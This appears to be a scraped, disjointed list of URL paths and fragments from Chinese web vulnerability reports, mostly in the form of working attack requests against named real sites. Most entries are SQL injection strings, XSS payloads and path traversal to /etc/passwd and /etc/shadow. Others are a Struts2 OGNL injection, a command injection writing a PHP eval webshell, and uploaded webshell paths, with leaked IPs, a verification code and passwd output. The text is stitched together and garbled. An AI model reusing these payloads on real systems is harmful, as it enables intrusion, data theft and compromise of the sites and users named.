/sys_admin/login.php /sys_admin/menu.php /marry/marryadmin/web/login.php /ncmmw2013/index.php www.shvns.com /0day/phpcms_v9_csrf_add_admin.php /specialprice/getspecialprice?t=0.4316234832371361&top=20&dep=PEK /download.aspx?image=index.aspx /download.aspx?image=make.aspx /admin/index.php /phpinfo.php /phpmyadmin/scripts/setup.php /phpmyadmin/index.php /.svn/entries /.svn/text-base/comm.php.svn-base /index.action /webexam/UserFiles/CkeditorFiles/Image/201302/20130224233701325.jsp /xxfb/wsbs.do?method=enterWsbs&type=2&lm=wsbs&ksbm= /webexam/ /webexam/console/login.jsp?isNew=true / /ucva/phoneareaupdate.php?uid=258667 /dnf/act/test/ht.php?app=800100574&txt=CODOL%20%20%20%20%D4%B8%20%20&num=2&rd=797&callback=jsonpCallback2%27%3E%22%3E%3Cimg+src%3Da+onerror%3Dprompt%281%29%3E /international.html?back_radio=2&fromcity=&date=&Rtdate=&area=&area_radio=1&fc_fromcity=%D6%D0%CE%C4%7C%C6%B4%D2%F4%7C%CA%D7%D7%D6%C4%B8&fc_tocity=%D6%D0%CE%C4%7C%C6%B4%D2%F4%7C%CA%D7%D7%D6%C4%B8&date=yyyymmdd&date2=yyyymmdd&tocity=';window.a==1?1:prompt(a=1);// /user/user/followingp?isnext=1&perpage=10&previd=13450826963028&callback=getIdolOrFansList&_=1360937823109&uid=4055919433585000455x1%bf%27or+2+limit+1%23 jjd.panjin.gov.cn/more.php?id=2518953377698进去显示“需要博彩流量的朋友可以与我联系,详细了解加我QQ与我洽谈,了解情况后先付定金测试。拒绝探子” /Discuz!/uc_server/admin.php论坛的uc后台存在弱口令,, /beta/help/index /index.php/interview/show/bq-wy/id-8 /hp2010/marketing/newscontent.php?news_id=737 /top/ajax/friendships?user_id=11223344&att_location=profile_userprofile&action=create&_t=0 /report/ajax/friendships?user_id=11223344&att_location=profile_userprofile&action=create&_t=0 /interface/video_pub.php?type=3&value=464&limit=200 /sso/login?service=http%3a%2f%2fjf.ct10000.com%2fSelfHelp%2fdefault.aspx 3A2C8BC3-5B68-4AE5-81D6-6DC378708F3E F3D0D36F-23F8-4682-A195-74C92B03D4AF /manage/admin/admin_db.php?sId=1 /account/ajax.php?action=bindcode&v=13800138000 /people/!Nzc0MDcwYjEwNjQyNDM3ZkBmb2N1cy5jbg==/ /test.php /admin/ /install.lock /admin.php 
/Admin/Login.asp /comindex.action /getcompanyinfor.action?website1=www.xxx.com www.xxx.com,就成了经过工商认证的钓鱼网站.或者利用注入直接添加虚假执照,修改website1的值,等等 /getcompanyinfor.action?website1=www.xxx.com / plus.kanglu.com/plus/AILISERVER/server/extend/model.class.php /yao/index.php?page=20&m=yyzhaos&a=index&tagid=56 /mysql/sql.php?db=urlevent20121029&table=url201210299&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=9aee24a05451840079a998ca31bab5e6&goto=tbl_structure.php&back=tbl_structure.php&sql_query=ALTER+TABLE+%60url201210299%60+DROP+%60GETORPOST%60&cpurge=1&purgekey=GETORPOST&zero_rows=Field+GETORPOST+has+been+dropped www.9588.com /default.aspx?cooperateid=92545 /web/admin/login.php /admin/upload/upload.asp /article_cont.php?id=1201 /info.php /test.php /test1.php /images/newlogo.png/1.php /site/bwf/profile/backpwd3_inpwd.jsp?userCode=wangtao /site/bwf/profile/backpwd3_inpwd.jsp?userCode=liqiang /site/bwf/profile/backpwd3_inpwd.jsp?userCode=wangxue /site/bwf/profile/backpwd3_inpwd.jsp?userCode=wangdan /version/kav_setup.exe/.php softdl.pcdoctor.kingsoft.com/version/kav_setup.exe softdl.pcdoctor.kingsoft.com/version/kav_setup.exe / /svn/ /index.php?m=index.showimg&p=C:\boot.ini /index.php?m=index.showimg&p=index.php /ask/question/create /index.php?s=show&a=getapp&name=worth&uid=1718397773&wid=3256 /reg.asp /cn.pub.vpon.com/register.action /Login.aspx /Modules/agent/domain/domain_manage.jsp还是可以直接填写【MD5字符串】登陆(这里密码输入有长度限制,改一下就ok了) /Modules/agent/domain/domain-dns.jsp www.aimabz.com/www.86gw.com(北京婚庆网)、www.hongxiutuan.net(爱丽国际旗下团购网站)、www.7120.com(健康120)、www.huyigroup.com.cn(爱丽国际广告,可能是集团官网吧)......可能略有误差,呵 /install/install.core.php /home/cache/cachedata.php /core/api/shop_api.php /core/api/site/2.0/api_b2b_2_0_cat.php /core/api/site/2.0/api_b2b_2_0_goodstype.php /core/api/site/2.0/api_b2b_2_0_brand.php /info/ /scsx/ /marry/set_index.php?action=newslist&userid=195 /?product-gnotify /marry/set_index.php?action=newslist&userid=15 
/install/svinfo.php?phpinfo=tru /ailicms/login.php /ailicms/login.php /2011ailicms/login.php /ailicms/login.php /manage/ /db/ /manage/login.php /pma210/index.php /ailicms/login.php /manage/login.php /u.php /u.php/cms /u.php/work /u.php/logent /u.php/expert xxx值 alert(document.cookie) /v/home/Shoppinglist.aspx?id1=2 /epg/template/template489/play/play.php?id=WLSP252377 /common/index.action /marry/set_index.php?page=398&action=messageboardlist&userid=118+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28table_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6D6172727938366777+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 /commentstopiccontrol.php?method=getlist&tid=DDNVZQ== / /Query.asp?ID=%27 /login.aspx; /bank1/bankdefault.aspx /strlplsp/strlpdefault.aspx /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /gfan_game/ /Login.aspx /support/FileCenter/SptDownload.aspx?path=c:\WINDOWS\system32\drivers\etc\hosts&fileName=addd.txt&type=tsm / /hwyst/question.php?question_id=120111104949 /account/ajax.php?action=deladd&id=20643 /account/ajax.php?action=deladd&id=20655 user_id:2856430 user_id:2837024 /ajax/sms.php?action=loginmobilebindcheck&mobile=150***9543&user_id=2856430&verifycode=rjpo&r=0.25387939011119365 user_id:2837024,这里的手机验证码是716392: /front/order_pay.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /cbs_portal/order/order!detail.action?id=1234 /cbs_portal/order/order!cancel.action?id=1234 partner.360buy.com /3pl/CaXun/PrintQJ.aspx?id=Q6465518 /3pl/mail.aspx /3pl/source.aspx /3pl/CaXun/PrintQJ.aspx?id=Q6465518 /Manage/Login.aspx 
/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml / /Style/news.asp?action=true&RID=1&ID=1 /2010b2c/media.php?id=142 /2010b2c/login.html /thread0806.php?fid=4&search=&page=2 /thread0806.php?fid=4&search= /thread0806.php?fid=4&search= /plus/ds/dstv.php?kid=31 /1.txt /zdGpsNavi.html /MesseUserAction!findByID.action?id=59 /c52010/photo_show_detail.php?id=174 /?q=service/oppostore/p/%E5%B9%BF%E4%B8%9C/c/%E5%B9%BF%E5%B7%9E'/g/1 /Admin/login.asp /xiaonei/common/getUserSetting.action?callback= /tianlei/shumenol2/upload.php /tianlei/shumenol2/view.php?id=1845007 /_admin/log.php www.biostime.com.cn/ www.biostime.com.cn:存在Fckeditor编辑器漏洞,直接上传网马,拿到Webshell /CyanogenMod/android_system_su/blob/ics/activity.c name=".FakeSuRequestReceiver priority="10000 name="com.noshufou.android.su.REQUEST / /neirong_wangzhan.php?id=10437 /coursecommentlist.aspx?id=665 var%20b=rich_postor._editor.getHtml();c=rich_postor._getData();c.content= /forum/pic/item/6f657e2eb9389b50e1daf96e8435e5dde7116e1d.jpg"%20height="1"%20width="1 /p/2192179599 /userlist.asp efeng.com/pk/index?year=2013 /,看到就业信息,随便试了一个http://job.ncss.org.cn/job/view_job?jobId=39ce1b48e9844d3cb32a03dc56b16d49 /client/index.action /road/showdetail.php?roadid=21589存在注入点, /road/showdetail.php?roadid=2158900000000000 /user/?do=address_list&ac=add中可以插入JS代码,导致XSS /search/dosearch?searchitem=server&searchtxt=a'%20or%20'%25'%3D'&pagenum=0&cid=0&city=0&sortby=0 /search/dosearch?searchitem=server&searchtxt=a&pagenum=0&cid=0&city=0&sortby=0 /search/dosearch?searchitem=server&searchtxt=a'%20or%20'%25'%3D'&pagenum=0&cid=0&city=0&sortby=0 /domain/dnsmanage.do?method=getDomainNameserverVO&dnsName=已注册的本域名下的DNS /domain/dnsmanage.do?method=getDomainNameserverVO&dnsName=ns1.ku6.net /user/updateAddress/id /user/updateAddress/1000000 /front/.svn/entries /front/.svn/text-base/index.jsp.svn-base /front/.svn/text-base/login.jsp.svn-base /wapLogin/getFlow.action 
/wapLogin/sendSms.action /wapLogin/getReal.action /productMessage/mealUseCase.action /BillDetails/getBillDetail.action /businessOperations/getAllValueAdds.action /businessOperations/BusOperInfo.action /businessOperations/handleBusiness.action /go/act/sns/ui.php?name=alert(1)&ui=%7Bwidth%3A130%2Cheight%3A60%7D&tiaocfg=%7Bsource%3A%22module%22%2CmoduleId%3A%2210%22%2Citems%3A%5B%7Bid%3A%2212877916061%22%2Cpic%3A%22%22%7D%5D%7D&Sharecfg=%7B%7D&callback=%7Binit%3A%22xdcb_sns87fcf3117670a_parent%22%2Chide%3A%22xdcb_snsb1490bea6fc62_parent%22%2Cshow%3A%22xdcb_sns3a2ea08a237c7c_parent%22%7D&_iframe_id=%22sns1cfb66c62805a9%22 /view_image.php?pic=Wx0GGlFDXA1VUwMDWx0SCwkNGRFcVxxQW1UcCxMFRBkDCFdVV1cRRhpVRDhHEVp3YmtTbngxKgslQh0XDGsDB0FbR1NFBgYV&title=ob7Qx9S3w%2FvXsaG%2FID%2FQwsTvuvOw67PMuPrXsT8gMjAwfjYwMNSq&version=2&c=ZGY0YmE1MWYzODZiMDU3NWYxZTYyNzYxNDFjZGZiZjM%3D&itemId=\x22\x3e\x3cimg\x20src=1\x20onerror=alert(1)\x3e\x3ci\x20a=\x22pkavoverx&shopId=34423124&sellerRate=28&dbId=&fv=9 /go/act/sale/danpin660x90-0813.php?p4p=alert(1);pkavover /go/act/sale/danpin190x300-0809.php?p4p=alert(1);pkavover /go/act/sale/danpin336x280-02.php?p4p=alert(1);pkavover /go/act/sale/tbkelite_mainchannel1.php?callback=alert(1);pkavover /go/act/danpin300x250ceshi0915.php?p4p=alert(1);pkavover /go/act/try/widget-iframe.php?widget=0&type=32&status=1&tag=%BD%F0%B1%D2&sort=buyStatus_startTime&maxNum=50&pic=160&width=740&height=1200&layout=1&pt=%22%3E11111%3Cscript /member/autoReglogin/auto_reglogin.htm?reg_type=0&is_need_login=true&is_need_reg=true&from=autoReglogin&dis_title=false&callback=TB.app.FastBuy.DoAuth&auto_iframe_height=a;alert(1)}catch(e){}};alert(1);function /license!getExpireDateOfDays.action /license!getExpireDateOfDays.action /tender_details.php?tid=106替代能源推广中心 /tender_details.php?tid=4074城市发展部 /tender_details.php?tid=332 /tender_details.php?tid=2101 /eproc/tender_details.php?tid=58巴格马蒂河治理委员会 /tender_details.php?tid=19814联邦事务和地方发展部 /tender_details.php?tid=1744电信 
/tender_details.php?tid=95 /search/searchById?id=1713675 /twsearch/twSearch?key= /1581 /a2Dy void(0) /peifo/ /skins/dttmk.php /login.do?state=login /login.do?state=publicFilesDownload&filename=../../../../../../../../../etc/passwd /login.do?state=publicFilesDownload&filename=../../../../../../../../../etc/shadow /.svn/entries /.svn/text-base/cache.jsp.svn-base /admin/.svn/text-base/login.jsp.svn-base / /client.php /order.php /time.php / /user/mall.html mione_plus:2.3.5/GINGERBREAD/2.3.6f:userdebug/test-keys /phpmyadmin/ pinyin.sogou.com/tailors/home.php?ac=publicskin&item=other&skin_id=0&tid=0&utid= mysql://10.10.92.30:3306/adserv /bugs/wooyun-2013-017481 weibo.cn weibo.com可以找到大量的gsid,经过测试, /u/1768856242?vt=1&wm=4007&gsid=xxxxxxxxxxx /?keyword=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Ca+ /view/index.action /p/android/issues/detail?id=14602&q=exploit&colspec=ID%20Type%20Status%20Owner%20Summary%20Stars /login.action /aj_re/add?__rnd=1362498869847 /csrf/weibo.html /index.php?sid=28934 5?a700e979991e40:174.132.203.250 6da8202948d6a2db:10.30.33.56 /admin/admin.php /center/notice_msg_detail.php?group=shalu /center/notice_msg_detail.php?group= /editor/editor/filemanager/upload/php/upload.php?Type=Media /interface/album/album.php?op=3&iId=11&name= /interface/album/album.php?op=13 /interface/ugc/ugc.php /interface/album/album.php?op=13 /interface/album/album.php?op=13 /interface/album/album.php?op=3&iId=11&name= /interface/album/album.php?op=13 /hskxread.php?id=1638 /hskxread.php?id=1638 /hskxread.php?id=1638 /instruction/unclaim.htm?page=758&cnName=&by=%28case%20when%281=1%29%20then%20id%20else%20cnName%20end%29&order=desc /instruction/unclaim.htm?page=758&cnName=&by=%28case%20when%281=2%29%20then%20id%20else%20cnName%20end%29&order=desc / /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php 
/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||chmod /journalx/secure/admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector /CN/item/downloadFile.jsp?filedisplay=../../CN/item/downloadFile.jsp /sineactive/article/10 /aomei2011/hospital/31%20and%201=2%20union%20select%201,2,database%28%29,4,5,6,user%28%29,8,9,0,1,2,3,4,5,6%23 /aomei2011/person/867%27%20and%20%27%27=%27 /videos/list/12%27%20and%201=1%20and%20%27%27=%27 /videos/list/12%27%20and%201=2%20and%20%27%27=%27 /jperfect/jperfect/admin/ /jperfect/jperfect/admin/?act=check&tname=mkt_counter%bf'%20union%20select%201,2,3,4,5,6,group_concat(schema_name)%20from%20information_schema.schemata%23 /news_c.php?cid=46000000000000000000000 /news_c.php?cid=46000000000000000000000 /admin /register/reg_service.aspx)获取手机验证码,只需要提供手机号,无需手机接收即可获取验证码。 /?q=software&d=ASCx /?q=software&d=ASC,%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29 /?act=u_itemlist&queryinput=sdfsf%27fs /?act=u_example_more&itemid=862%27 /index.php?q=mp3/product/detail&name=X7%27 /?q=index/list&model=A209&sortby=downloads%20asc /?q=index/moreRecom&model=A209&sortby=downloads&order=DESC /?q=interface/editor&name=x905%27&fid=209 /?q=interface/editor&name=x905%27%20and%201=2%20union%20select%201,user%28%29,3%23&fid=209 /do.php?ac=login&rfu=http://paper.pubmed.cn/ /do.php?ac=login&rfu=(可构造任意链接进行跳转) /article站点的搜索处的XSS进行测试。 /article/search.htm?keywords=%3C%2Ftitle%3E%3Cscript+src%3D%22http%3A%2F%2Fxss.ezsec.org%2F%3Fu%3Df71717%22+%3E%3C%2Fscript%3E&category=-1&action=Search&action_search= /E273r7 /User/PassCardEdit.aspx?id=900 /news.details.php?id=219 /phpmyadmin/ /index.php?d01=G1F8V0B /_sysadmin/index.php /examinate/system/login.do /my/login.php 19.0 
/my/reset_password.php?step=reset&verifycode=xxxx&id=xxx /uploadfile/avatar/113626382045.php /wp-content/uploads/recipt_imgs/20130307075334.php /mall/task/ajaxShareGoods /iframe.html?rnd=1362575759788 / /bugs/wooyun-2012-08966 /portal/auth/reg_newuser.jsp /zhuce/admindata/shansuirencaidata.mdb /index/onlineAgent.do /GM/af/contract_getPassWord.do /MUB2G/login/loginAction_initSession.do /tmp/updateme/sinfor/ad/sys/sys_user.conf /plus/search.php?keyword=as&typeArr[111%3D@`\ / / /ProductShow.asp?ListId=185 /admin/uploadfile.asp?todo=uploadfile /support/digital_cameras/software_detail.php?id=81 /cdtv_game_api/index.php/module/aciton/param1/$%7B@phpinfo()%7D /about/404/images/wooyun.php / /login.jsp /login.jsp /login.jsp /news_details.php?id=107000000 /2011.php /hp/home?uid=55804 /page.php?id=206 /page.php?id=206 /page.php?id=206 /hotelinfo/Hotel.aspx?hotelID=2001272&StayDays=1&Rooms=1&checkin=0001-01-01 /iframe_brief.php?style_id=103639221 /PointGift/ListView.aspx?membertype=2&giftTypeID=8 /coupon_detail?coupon_id=201623 /robots.txt /admin /node/359 /node/360 /node/361 /node/362 /site/news/infodetail.php?strID=13379 /vhostmanage.do?method=viewVhostInfo&serviceCode=VMOVE0804250**** /policyRuleWeb!detail.action?id=701 /新闻内容.aspx?aid=439 / /portal/db/dbupdatelog_list.jsp /portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&PageIndex=1&OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG /portal/db/dbupdatelog_addedit.jsp /svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp /settings/personal 126.am/dTPsg2 /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /settings/personal none 126.am/dTPsg2 /aZfcn / /tmp/updateme/sinfor/ad/sys/sys_user.conf /qa/index.php /qa/index.php?qa=account这里改了个名字 /setting/change-email /setting/profile /gis/reports/menu.php?id=ImpactFeesReport 
/gis/reports/output.php?id=ImpactFeesReport&month=3&year=2013&fee_type=all&fee_status=all&detail=limited&format=html /gis/reports/output.php?id=ImpactFeesReport;phpinfo();&month=3&year=2013&fee_type=all&fee_status=all&detail=limited&format=html /resv/print.aspx?resvCode=RW1303080000014257-R10001610000xxxxxx /寻找几个妹子帐号……厂商记得把她改回去哦……邮箱联系她嘛~~就选doriswoods吧 /member/ /content.php?typeid=1&gid=17 /play.php?class_id=22 /fresh/fresh.aspx?id=1 /web/template/web-articleInfo.action?bookArtId=29405 /toyotaadminqwerty/WebToYoTa913AsDf/login.php /App_User_UserUpload.php?type=1&user_id=508387182 /autoparts?1=3&p=3&p01=-1 www.faw-vw.com/autoparts?k= /xxxxx /charge.action /fajian/2013-03-10/755003105011.JPG /fajian/2013-03-10/755003105010.JPG /fajian/2013-03-10/755003105009.JPG /fajian/2013-03-10/755003105007.JPG /fuc/tk.php?i=ddd%22/%3E%3Cimg%20src=1%20onerror=alert%281%29%3E%3C /Member/OrderDetail/1303111304257871 /wandaFilm/home.action www.youku.com /content/1693 220.181.154.91/123.126.98.141(这个机器留有rootkit麻烦及时清理) /log.txt /log.txt /log.txt /log.txt /uc_server/control/admin/db.php /source/plugin/myrepeats/table/table_myrepeats.php /readme.txt /test.php /admincp.php /fckeditor/editor/dialog/fck_about.html /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fceping.xdf.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php /info.php / /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /UserCenter/GetIcon.aspx?id=107130 /DCC/domainSourceIPDetail.do?method=sourceIPDetail&domainName=adimg.51auto.com /DCC/accountDetail.do?method=accountDetail&id=51auto www.icolor.com.cn /cms/upload/fjsc.jsp?filePath=cms-uploadfiles-download&isfn=1&ischeck=1&fileType=.jpg,.bmp,.gif,.rar,.zip,.doc,.jsp,.wps /mngr/user/userInfo.jsp /mngr/check/getRingContentList.action?operGroupLevel=0&start=10 
/mngr/privilege/getPrivilegeListByGroupId.action?operGroupLevel=0 /mngr/check/getHistoryRecord.action?historyType=&start=100 /Car/OrderDetail.aspx?o=4206136 /member/mypub2010/user/userchanges_ajax.asp?act=yzemail&email=yourmail@qq.com /member/mypub2010/user/ver_tel.asp?mobile=&yzm=%22%3E%3Ciframe%20src=http://g.cn%3E /member/mypub2010/user/ver_tel.asp //plus/search.php?keyword=as&typeArr[111%3D@`\ ///plus/search.php?keyword=as&typeArr[111%3D@`\ /ticket/passenger/passenger_info.jsp?&type=passenger&callback=qunarcallback /2012/kongtiao/works.php?works=81 /pmis/factory/login.php /server/login.jsp /login/?next=/ /dragon/login.php /2010mini/lephonesns/admin/ /newadmin/login.php /2012/china4abm/ /pv/ip.php / /2012/motorolarazrv/quespc.php?tmpid=KR8eNVfQ&quesid=8 /2012/tsingtao/join.php?t=7@2*dgvsydl /dragon/admin/commend_list.php / www.j1.com /ROACON/index.html /wsUDT/url/ia-user-task!update.action?userTask.taskId=2504 /admin/(http://211.137.84.199:8080/admin/)两个是一样的 / /gsaicEn/regedLogin!login.do /util/downFile.jsp?fileName=../util/downFile.jsp /xuexi/login.action /notice/login.do /logon.action /college/16 /college/16 /college/16 /jobdetail.aspx?id=329 /spDepartRepertory/spDepartRepertory!repList.action?deptid=32&domainCode=PDSS /index!index.action?department.code=zhongxin /funing/front/wsbsthird.action?id=120&tid=306 /index!department.action?level=3®ionID=1&departmentID=158 /login/login.action /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf 
/dapei/woyaodapei/?act=scheme&styleid=8&roomid=19 /dapei/woyaodapei/?act=scheme&update=update&uid=3165 green.lsea.com.cn/admin/default.aspx /account/saveAddress /count2.php?start=1363142400&end=1363314780&adid=3666 /pms/home/login.action 19.0 /sysadmin/htm/index.php?q=user/getbackpass&back=/sysadmin/htm/index.php?q=myoppo/index /weibo/%2522%253E%253Cscript%253Ealert%28%252Fxss%252F%29%253C%252Fscript%253E&Refer=STopic_box /cmsadmin/index.jsp /m.php?m=UserCenter&a=show_order&id=1677234&s=45191f0d0401d8a026cc9ac15f799026,id=xxxx /m.php?m=UserCenter&a=show_order&id=1234567 /index.php?m=UcOrder&a=del&id=1234567 /mydns/recordsList.do?DomainName=xinnet.com&mystring=[MD5]&mystring2=[跟代理商有关的一个编号 submitDNSFormaaa('域名') /domain/manage.do?method=list&serviceState=02&forward=inusing /mydns/recordsList.do?DomainName=[目标域名]&mystring=[目标域名的MD5]&mystring2=[跟代理商有关的一个编号 /zh-tw/news/NewsListAll.aspx?kinds=2&newskind=1 /passport/Regist.aspx /system/login.do /g2/login.action /cn/search.aspx?k= /guide/message.html /guide/mes_dis.jsp /guide/mes_detail.jsp?id=133439 /guide/mes_detail.jsp?id=133428 /12/0401/15/7U11041B0001125P.html / /admin/ 114.247.0.52 /unicom/UltraProcess/ManageProcess/BaseInfoPrint.jsp?baseid=000000000001343&baseschema=UltraProcess:UniComm_Others&isarchive=0 18897/eyooboard/include/data/message.db /?i=3371),我还纳闷,为啥用户名是这个?原来是这货的邮箱名,再加上信息综合匹配度猜测,可以看的出这货不怎么保护个人信息,这些信息准确率达到90%以上!) /?i=3371),这意味着什么?这意味着他妈的有一个通用的后门存在!!! 
/product-17312.html /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /xx.com /topic.php?channelID=70&topicID=140&pid=66 /share/download.jsp?filePath=../../../../../../etc/passwd /account/accountInfo/gerAddressByIdAjax/?id=5 /index.action /plugins/index.php?q=imgurl&url=QGltZ3VybEAvZGF0YS9pbWFnZXMvYXZhdGFyL25vYXZhdGFyX21pZGRsZS5naWY&id=112 /download_con.shtml#1 /sphoto/bupt/login.htm /sphoto/bupt/login1.htm www.tpri.gov.cn /?u=954d3d /cx.asp / www.qhjc.gov.cn //shop/100501/infocase/%24%7b%40print(md5(admin))%7d / www.siilu.com /index/clue?clueid=-1%20or%2011=11 / www.siilu.com / www.siilu.com web.mmc.edu.cn/wsc/dede/ /whir_system/module/security/login.aspx /whir_system/module/security/login.aspx /cms/console/zhuantipinglun.php?pagesize=10&zhuanti_id=1 /tcsoft/web/information.do?actionCmd=childList&pid=9&id=57&isChild=0)中,有不少城市图书馆采用了INTERLIB这套系统。所以这个漏洞影响巨大,泄露的个人信息已百万计,下面会进行证明。 /interlib/websearch/bookSearch?cmdACT=detailmarc&xsl=listdetailmarc.xsl&bookrecno=243630 /)采用的存在SQL注入漏洞的老ShopEx /shopadmin/index.php?ctl=passport&act=login。就不登录后台了,点到为止。 /bugs/wooyun-2013-020130——“尚品网任意邮箱绑定漏洞(两种不同方法)” /club.duiyi.tom.com.rar /club.aspx?clubid=233 /turbosearch/product.jsp?lb=2&zlb=%BF%B9%D1%D7%BF%B9%B2%A1%B6%BE%D3%C3%D2%A9 /turbosearch/product.jsp?lb=2&zlb=%BF%B9%D1%D7%BF%B9%B2%A1%B6%BE%D3%C3%D2%A9%25%27%20AnD%20%27%25%27%3d%27 /feedback.html就进来了。xss啊。我等了一个多月才来cookie啊,伤不起啊。单纯测试的。有什么不着的地方希望不要放在心里。 
/bugs/wooyun-2013-020128”,从这里得到我们想要的用户的邮箱地址,真实天助我也啊,哈哈哈。。。 /api/index/m/regist.isExistMail?mail=快播邮箱 /api/index/m/regist.isExistUsername?username=快播帐号 /regist.html / admin /index.php?op=ackrecvmsgbylastmsgid&_from=comet&rnd=0.9776598419994116 /redirect/?ad=32444&uid=&bid=Qm2N20BkIoU&unit=dale_homepage_online_activity_promo_2&crtr=3%3A%2F&cfg=78b3d142b7d8af4aaad54eac7b0d6d3c0deae0c7&ns=1363416628656164000&target=http://site.douban.com/infiniti/room/2674886/"%0d%0aalert(1)%0d%0a /derscn/portal/UserInfoAction.do?method=edit&loginName=mytest001 /derscn/portal/UserInfoAction.do?method=edit&loginName=admin /index.php/index/friend/follow/type/1/name/wooyun2 /user/getpassword /admin/member/dwlist.cfm?id=XXX alert(/1/) /admin/admin.asp /p/2214633607 /download/seeepdds/4385943)把封禁吧名UTF-8编码。。之后ANSI解码,解码后是汉字就可以了。 /f/center/createtb?kw= /app/enter?appid=291067)把封禁吧名UTF-8编码,再把编码放进(http://tieba.baidu.com/f/center/createtb?kw=【这里面】)按回车。 /bbs/viewthread.php?tid=3671011 /bbs/attachment.php?tid=3671011&aid=9590&pay=yes /vote.asp?action=show&id=1 /servlet/DownloadFileOper?fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:81:81:System /:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:74:74:Privilege-separated 
